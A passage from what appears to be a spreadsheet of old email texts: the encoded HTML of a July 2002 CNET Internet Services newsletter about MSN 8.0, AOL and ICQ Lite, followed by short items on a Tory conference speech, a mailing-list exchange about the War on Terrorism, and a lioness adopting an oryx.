 dth=3D"10" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;td width=3D412&gt;
 =09=09
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"10" height=3D"1" =
 border=3D"0"&gt;&lt;font face=3D"Arial, Helvetica" size=3D"-2"&gt;July 18, 2002&lt;/fon=
 t&gt;&lt;br&gt;
 =09=09=09&lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"3" b=
 order=3D"0"&gt;&lt;br&gt;
 =09=09=09=09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D412&gt;
 =09=09=09=09&lt;tr valign=3Dtop&gt;
 =09=09=09=09=09&lt;td width=3D76 align=3Dright&gt;
 =09=09=09=09=09=09&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/sw/lindseyt.gi=
 f" width=3D66 height=3D86&gt;&lt;br&gt;
 =09=09=09=09=09=09&lt;font face=3D"arial, helvetica" size=3D"-2" color=3D"#666=
 666"&gt;
 --&lt;A HREF=3D"mailto:software_mailbag@cnet.com"&gt;Lindsey Turrentine&lt;/A&gt;&lt;br&gt;
 Senior editor&lt;br&gt;
 CNET Software and Internet&lt;br&gt;&lt;/font&gt;
 =09=09=09&lt;/td&gt;&lt;td width=3D10&gt; &lt;/td&gt;
 =09=09=09&lt;td&gt;&lt;font face=3D"Arial, Helvetica"&gt;
 =09=09=09&lt;font color=3D"#333333"&gt;&lt;B&gt;Dear Readers,&lt;/B&gt;&lt;/font&gt;&lt;BR&gt;
 =09=09=09&lt;font size=3D"-1"&gt;
 On the surface, it seems odd that Microsoft and AOL compete with
 one another. After all, while Microsoft is a giant software
 powerhouse, AOL Time Warner is totally different--a giant media
 powerhouse. Nonetheless, they're at it again, working like crazy
 to dominate the ISP space. While AOL is busy renovating the guts
 of upcoming AOL 8.0, which will finally integrate the Netscape
 browser, Microsoft is nipping at its competition's heels with MSN
 8.0. Will Microsoft make enough improvements to finally catch up
 with AOL? It just might. &lt;P&gt;Find out more in our &lt;a href=3D"http://clickthr=
 u.online.com/Click?q=3D05-gDULIG8PCtUn-3efnODtxI8fiiuR" &gt;&lt;B&gt;MSN 8.0 First
 Take&lt;/b&gt;&lt;/a&gt;.
 &lt;P&gt;
 =09=09&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09=09=09&lt;/table&gt;
 =09=09=09=09&lt;/td&gt;
 =09=09=09=09&lt;td width=3D8&gt;&lt;img src=3D"http://home.cnet.com/b.gif" alt=3D"" =
 width=3D"8" height=3D"1" border=3D"0"&gt;&lt;br&gt;&lt;/td&gt;
 =09=09=09&lt;/tr&gt;
 =09=09&lt;/table&gt;
 &lt;!--Info Button Bar Web Hosting --&gt;
 &lt;table cellpadding=3D0 width=3D"100%"&gt;
   &lt;tr&gt;
     &lt;td align=3Dcenter&gt;
       &lt;table width=3D"100%" cellspacing=3D"0" cellpadding=3D"0" border=3D"0=
 "&gt;
 =09    &lt;tr&gt;
 =09=09  &lt;td align=3D"center" colspan=3D"5"&gt;&lt;img src=3D"http://www.cnet.com/=
 Ads/Media/Images/ad10-dk.gif" width=3D"120" height=3D"10" alt=3D"advertisem=
 ent"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign=3D"middle"&gt;
           &lt;td colspan=3D"5" bgcolor=3D"#999999" height=3D"15" class=3D"w"&gt;&lt;=
 b class=3D"v1"&gt;&lt;font face=3D"verdana,geneva,helvetica" size=3D"-2" color=3D=
 "#ffffff"&gt;&lt;b&gt; Quick links to Services &amp; Prices from these companies&lt;/b&gt;&lt;/fo=
 nt&gt;&lt;br&gt;&lt;/td&gt;
         &lt;/tr&gt;
 =09=09&lt;tr valign=3D"middle" align=3D"center" bgcolor=3D"#eeeeee"&gt;
 =09=09  &lt;td height=3D"35"&gt; &lt;/td&gt;
 =09=09  &lt;FORM action=3Dhttp://www.cnet.com/cgi-acc/clickthru.acc method=3Dg=
 et&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.dellhost-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservi=
 ces.cnet.com%2fcgi%2fpremier.asp%3fcid%3d1006102&gt;&lt;INPUT type=3Dsubmit value=
 =3D"    DellHost    "&gt;&lt;/td&gt;&lt;/form&gt;&lt;FORM action=3Dhttp://www.cnet.com/cgi-ac=
 c/clickthru.acc method=3Dget&gt;
 =09=09  &lt;td width=3D"50%" align=3D"center"&gt;
 =09=09  &lt;INPUT name=3Durl type=3Dhidden value=3Dhttp://home.cnet.com/go/to?=
 tag=3Dex.ws.ros.disptchbut.aplus-disptch&amp;destUrl=3Dhttp%3a%2f%2fwebservices=
 .cnet.com%2fcgi%2fpremier.asp%3fcid%3d1000015&gt; &lt;INPUT type=3Dsubmit value=
 =3D"    Aplus.Net   "&gt;&lt;/td&gt;&lt;/form&gt;
 =09=09  &lt;td&gt; &lt;/td&gt;
 =09=09&lt;/tr&gt;
 =09  &lt;/table&gt;   =20
 =09&lt;/td&gt;
   &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!--/Info Button Bar Web Hosting --&gt;
 =09&lt;!-- bottom rule --&gt;
 =09&lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D410&gt;
 =09&lt;tr valign=3Dtop&gt;
 =09=09&lt;td bgcolor=3D"#F7D69C"&gt;&lt;img src=3D"http://home.cnet.com/b.gif" width=
 =3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;
 =09&lt;/table&gt;
 =09
 &lt;table border=3D"0" width=3D"100%" cellpadding=3D"10" cellspacing=3D"0"&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td&gt;
 &lt;font face=3D"Arial, Helvetica"&gt;=09=09=09
 &lt;img src=3D"http://www.cnet.com/i/nl/sw/sub_rev.gif" alt=3D"Review" height=
 =3D"19" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;!-- Reviews gif=20
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D93 align=3Dleft&gt;
 &lt;tr&gt;&lt;td&gt;&lt;img src=3D"http://a.r.tv.com/cnet.1d/i/p/082801ie6.jpg" width=3D"8=
 5" height=3D"110" border=3D"0"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 End Reviews gif --&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D1a-y6ZkIlXxiC1GbxEd5q0_HZB=
 17WsR" &gt;This week in Internet Services&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Ever heard of a type of lawsuit known as a &lt;i&gt;cyberSLAPP&lt;/i&gt;? We hadn't eit=
 her. A cyberSLAPP case
 typically involves "a person who has posted anonymous criticisms
 of a corporation or public figure on the Internet," according to
 a coalition of privacy groups who are fighting to stop the
 practice. Find out more.
 &lt;/font&gt;&lt;p&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D2f-hYaFIqnI30GA8_DP26D_8ga=
 ZjMZR" &gt;First Take: MSN 8.0 Beta&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Redmond has been talking up the newest version of MSN for months,
 and now, the proof"s in the pudding. Testers have their hands on
 the beta of MSN 8.0, and so far, this ISP looks and works better
 than past versions. The great No. 8 even has antispam tools and
 improved parental controls. But will MSN topple AOL?
 &lt;/font&gt;&lt;p&gt;
 &lt;font face=3D"arial, helvetica"&gt;&lt;b&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D44-9nxfIZU9btjouz1EMLKlXBD=
 gnVnR" &gt;First Take: ICQ Lite Alpha&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 One of our biggest beefs with ICQ has always been its bloated
 feature set. Now, the company has released a new lite ICQ that
 sucks up far less system memory than the full-fat version--but at
 what cost? We take an early look.
 &lt;/font&gt;&lt;p&gt;
 &lt;p&gt;
 &lt;!-- Scoop --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_scoop.gif" width=3D150 height=
 =3D19 alt=3D"The Scoop"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D59-y53oIEn9utyysBAlpW-B=
 _KMqztrR" &gt;Looking for a new DSL provider?&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 The DSL Power Search makes it easier to find the perfect
 broadband provider for your needs. With our search, you can
 identify the DSL providers in your neighborhood, then compare
 prices and plans to make sure your new connection meets with your
 objectives without breaking your budget.
 &lt;/font&gt;&lt;br&gt;
 &lt;!-- End Scoop --&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;!-- this week --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_news.gif" width=3D150 height=3D=
 19 alt=3D"This Week in News"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D6e-2aYjIyEG1Du0eDnQA5K-=
 fxuEL5iR" &gt;&lt;b&gt;Don't type that: Yahoo edits e-mail&lt;/b&gt;&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Yahoo's filter hunts for words that could activate JavaScript,
 then it replaces them.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D83-U-BXQYJq_Z86j76tuoAA=
 BMMPZ9FR" &gt;Scient files for Chapter 11=20
 &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 The Internet consultancy and former highflier is also selling
 certain assets to SBI and Company, a professional services
 firm.
 &lt;/font&gt;&lt;br&gt;
 &lt;p&gt;
 &lt;!-- CNET WEEKLY tip --&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/ws/sub_tip.gif" width=3D150 height=3D1=
 9 alt=3D"Tip of the Week"&gt;&lt;br&gt;
 &lt;img src=3D"http://www.cnet.com/i/nl/rule.gif" width=3D410 height=3D8&gt;&lt;br&gt;
 &lt;b&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D99-4mtyQAdF8qRbtHM2H3f2=
 jvrqULcR" &gt;Online undercover!&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size=3D"-1"&gt;
 Unless you observe the proper safety rules, surfing the Net
 could land you in hot water. These simple tips can help.
 &lt;br&gt;
 &lt;/font&gt;
 &lt;br&gt;
 &lt;p&gt;
 &lt;img src=3D"http://home.cnet.com/i/dp/oncnet.gif" alt=3D"On the CNET Networ=
 k" width=3D"172" height=3D"14" border=3D"0"&gt;&lt;br&gt;
 &lt;img src=3D"http://home.cnet.com/i/nl/rule.gif" width=3D"410" height=3D"8" =
 border=3D"0"&gt;&lt;br&gt;
 &lt;table width=3D"410" cellpadding=3D0 cellspacing=3D0 border=3D0&gt;&lt;tr valign=
 =3Dtop&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dae-jOE6QMB2EScG_0b8-mh=
 e2RYEVuRR" &gt;Tech Trends&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc3-x1yCQJLHNffnW2hZ5zn=
 P-FdWuuFR" &gt;Hardware&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dd8-XW73QWLPzz3sd7FmkSW=
 reAgRDc9R" &gt;Software&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Ded-jLlvQgV7qkfVpacxv3o=
 rMjEsaQuR" &gt;Shopping&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D02-qia9IljjNkOs117_XGu=
 wrfzJ6nsR" &gt;Downloads&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D18-WhdzI987phpsOKLTiME=
 yR1N6759R" &gt;News&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D2d-OxQyIbKxNljDHcJVdng=
 yV7VDjSuR" &gt;Investing&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D42-rF7cIPKGJAYmjHppz3F=
 7_4EMIryR" &gt;Electronics&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D57-YJIXII0aTAUVbwLF0F_=
 wt9Q9dZPR" &gt;Web Building&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D6c-SUL3IuP88_71rM5KQCL=
 5-NPyEdnR" &gt;Help &amp; How-Tos&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;
 &lt;td&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;&lt;ul&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D81-z1IaQ-KpQsk9xj1pqfR=
 O9R6BpKcR" &gt;Internet&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D96-pjdWQtdhd9jMy8ejZWS=
 oS2P4JmRR" &gt;Games&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dab-ZcQKQYpMbnCJmMyXydi=
 t0M-0OvFR" &gt;Message Boards&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dc0-kfs-QWP1IwPXNSt41H9=
 9K8FZuS9R" &gt;CNET Radio&lt;/a&gt;
 &lt;li&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3Dd5-p-viQzL2495R6oGHCu4=
 jNix1DPuR" &gt;Music Center&lt;/a&gt;
 &lt;/ul&gt;&lt;b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;!-- Begin search box --&gt;
 =09&lt;table border=3D"0" cellpadding=3D"1" cellspacing=3D"0" width=3D"90%"&gt;&lt;t=
 r&gt;&lt;td bgcolor=3D"#CCCCCC"&gt;
 =09&lt;table border=3D0 cellspacing=3D0 cellpadding=3D0 width=3D"100%"&gt;&lt;form m=
 ethod=3D"GET" action=3D"http://www.search.com/redirect"&gt;
 =09&lt;tr align=3Dcenter valign=3Dmiddle bgcolor=3D"#FFFFFF"&gt;
 =09&lt;td height=3D40 align=3Dright nowrap&gt; &lt;/td&gt;
 =09&lt;td class=3D"f"&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;&lt;b&gt;Search&lt;/b=
 &gt; &lt;/font&gt;&lt;/td&gt;
 =09&lt;td align=3Dleft&gt;&lt;input type=3D"Text" class=3D"f" name=3D"qt" size=3D"12=
 " maxlength=3D"255"&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;select name=3D"target"&gt;
 =09&lt;option value=3D"http://internet.search.com/search?tag=3Dex.is.lrg.srch.=
 is&amp;sortby=3Dcompany%252Cservice&amp;join=3Dand&amp;keywords=3D%25%25q%25%25" select=
 ed&gt; Internet Services
 =09&lt;option value=3D"http://cnet.search.com/search?edition=3Dcnet&amp;cat=3D103&amp;=
 timeout=3D3&amp;tag=3Dex.ws.sr.srch_top.cnet"&gt;All CNET
 =09&lt;option value=3D"http://www.search.com/search?channel=3D1&amp;tag=3Dex.ws.sr=
 .srch_top.web"&gt;The Web=09
 =09&lt;/select&gt;&lt;/font&gt;&lt;/center&gt;&lt;/td&gt;
 =09&lt;td&gt; &lt;input name=3D'search' type=3D'submit' class=3D'f' value=3D' Go! '&gt;=
 =20
 =09&lt;input type=3D"hidden" name=3D"tt" value=3D"st.sw.8888.sbsr"&gt;&lt;/td&gt;
 =09&lt;/tr&gt;&lt;/form&gt;
 =09&lt;/table&gt;=20
 =09&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;=20
 &lt;!-- End search box --&gt;
 &lt;img src=3D"http://home.cnet.com/b.gif" width=3D"1" height=3D"8" border=3D"=
 0"&gt;&lt;br&gt;
 =09=09&lt;/td&gt;
 =09&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Thin grey line --&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D599 bgcolor=3D"#CCCCCC"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;table cellpadding=3D0 cellspacing=3D0 border=3D0 width=3D612&gt;
 &lt;tr valign=3Dtop&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D10 bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://home.cnet.com/b.gi=
 f" width=3D"10" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D1 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.gif=
 " width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 =09&lt;td width=3D600 bgcolor=3D"#000000"&gt;&lt;img src=3D"http://home.cnet.com/b.g=
 if" width=3D"1" height=3D"1" border=3D"0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### footer ### --&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"599" bgcolor=3D"#cccccc"&gt;&lt;img src=3D"http://www.cnet.com/b.gif=
 " width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#eeeeee" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"575"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"10"&gt;&lt;br&gt;
 &lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cnet-news=
 letters@example.com&amp;brand=3Dcnet'&gt;
 &lt;img src=3D"http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width=3D"375" height=3D"=
 18" border=3D"0" alt=3D"Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;=
 br&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletter=
 s@example.com&lt;p&gt;
 &lt;A NOTRACK HREF=3D'http://clickthru.online.com/Click?q=3Deb-Hl7orSD7zUbklPZ=
 pm6XdYcGMt-Ss6RRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D'http://nl.com.com/servlet/url_login?email=3Dqqqqqqqqqq-cne=
 t-newsletters@example.com&amp;brand=3Dcnet'&gt;Manage My Subscriptions&lt;/a&gt;
 &amp;nbsp;|&amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D00-4FQlI9QDB2=
 _NPH4bgi4cHr7W6T9R" &gt;FAQ&lt;/A&gt;&amp;nbsp;|
 &amp;nbsp;&lt;a href=3D"http://clickthru.online.com/Click?q=3D15-mYP_IGcDl2zCnMtAV=
 -hDEc2lRbuR" &gt;Advertise&lt;/A&gt;&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=3D"8"&gt;&lt;/td=
 &gt;
 &lt;td width=3D"12"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"12" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#000000" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" heig=
 ht=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10" bgcolor=3D"#ffcc00"&gt;&lt;img src=3D"http://www.cnet.com/b.gif"=
  width=3D"10" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"601"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"1" height=
 =3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" bgcolor=3D"#ffcc00" cellpadding=3D"0" cellspacing=3D"0=
 " border=3D"0"&gt;
 &lt;tr&gt;&lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.g=
 if" width=3D"1" height=3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"10"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D"10" height=
 =3D"1"&gt;&lt;/td&gt;
 &lt;td width=3D"37"&gt;&lt;a href=3D"http://clickthru.online.com/Click?q=3D2a-CNuWIr=
 IWzgptsfEabman8WccrYsR" &gt;&lt;img src=3D"http://www.cnet.com/i/dp/smrb.gif" wid=
 th=3D"37" height=3D"37" border=3D"0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width=3D"563" nowrap&gt;&lt;font face=3D"arial, helvetica" size=3D"-1"&gt;
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D3f-4sAEIqMPaOfkZypHcoh57By=
 mNzZR" &gt;&lt;font color=3D"#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D54-l6ovIZK3Cj6paAn0O9U4lR0=
 vdknR" &gt;&lt;font color=3D"#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D69-CY-iIoWOSIlwlfPMoAH4OpR=
 zLxrR" &gt;&lt;font color=3D"#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D7e-XDXeInp93vORT_Qi6pURwMp=
 opriR" &gt;&lt;font color=3D"#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href=3D"http://clickthru.online.com/Click?q=3D94-rOVNQaIqkZV_YBoJ5elUjfr=
 5JQdR" &gt;&lt;font color=3D"#000000"&gt;All CNET services&lt;/font&gt;&lt;/a&gt;
 &lt;/font&gt;&lt;/td&gt;
 &lt;td width=3D"1" bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" =
 width=3D"1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;table width=3D"612" cellpadding=3D"0" cellspacing=3D"0" border=3D"0"&gt;
 &lt;tr&gt;&lt;td bgcolor=3D"#000000"&gt;&lt;img src=3D"http://www.cnet.com/b.gif" width=3D=
 "1" height=3D"1"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td height=3D"25"&gt;&lt;font face=3D"ms sans serif, geneva" size=3D"-2"&gt;&lt;tab=
 le width=3D100% border=3D0 cellspacing=3D2 cellpadding=3D1&gt; &lt;tr valign=3Dbo=
 ttom&gt; &lt;td width=3D75% height=3D31&gt; &lt;p&gt;&lt;/font&gt; &lt;br&gt;&lt;b&gt;&lt;font face=3DArial, He=
 lvetica, sans-serif size=3D2&gt;    Copyright 2002 CNET Networks, Inc. All rig=
 hts reserved.    &lt;/font&gt;&lt;/b&gt; &lt;/p&gt;&lt;/td&gt;&lt;td height=3D31 valign=3Dtop&gt; &lt;div al=
 ign=3Dright&gt; &lt;img src=3D"http://gserv-cnet.zdnet.com/clear/outbound.gif?APP=
 ID=3D2&amp;EMID=3D25136487&amp;NL=3De425&amp;ISSUE=3D2002-07-18" height=3D1 width=3D1&gt; =
    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=3D2&gt;&lt;font face=3DArial, Helvetica, san=
 s-serif size=3D2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;IMG HEIGHT=3D1 WIDTH=3D1 SRC=3D"http://clickthru.online.com/Click?q=3Da9-I=
 lqq-AUmKeyCjeNB1Y_B5RSLDRRR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Leader tells Tories: stop sniping
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8723995,215/
 Date: 2002-10-10T03:26:56+01:00
 *Conservative party conference:* Iain Duncan Smith will today tell the Tory old 
 guard to stop sniping at his policy agenda.
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &gt; From: yyyy@spamassassin.taint.org [mailto:yyyy@spamassassin.taint.org]
 &gt; Sent: Tuesday, September 17, 2002 9:50 AM
 &gt; &gt; ... we've been fighting the War on Terrorism for as long
 &gt; &gt; as there's been commerce, so you'd think we'd /realize/ that
 &gt; &gt; escalation of violence is not a solution.
 &gt; 
 &gt; Well said!
 &gt; 
 &gt; --j.
 Yeah.  It certainly wasn't a solution to the Carthaginian problem or the
 Barbary Pirates.  Wait ... no ... actually ... it was a rather permanent
 solution.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [zzzzteana] Lioness adopts fifth antelope
</t>
  </si>
  <si>
    <t xml:space="preserve">http://www.guardian.co.uk/international/story/0,3604,806579,00.html
 Lioness adopts fifth antelope
 Rory Carroll, Africa correspondent
 Tuesday October 8, 2002
 The Guardian
 Kamuniak the dysfunctional lioness has forfeited another meal by adopting
 her fifth baby oryx this year, an aberration of nature which has baffled
 wildlife experts.
 The young lioness in the Samburu national park in northern Kenay adopted her
 latest baby at the weekend, a wildlife service warden said yesterday.
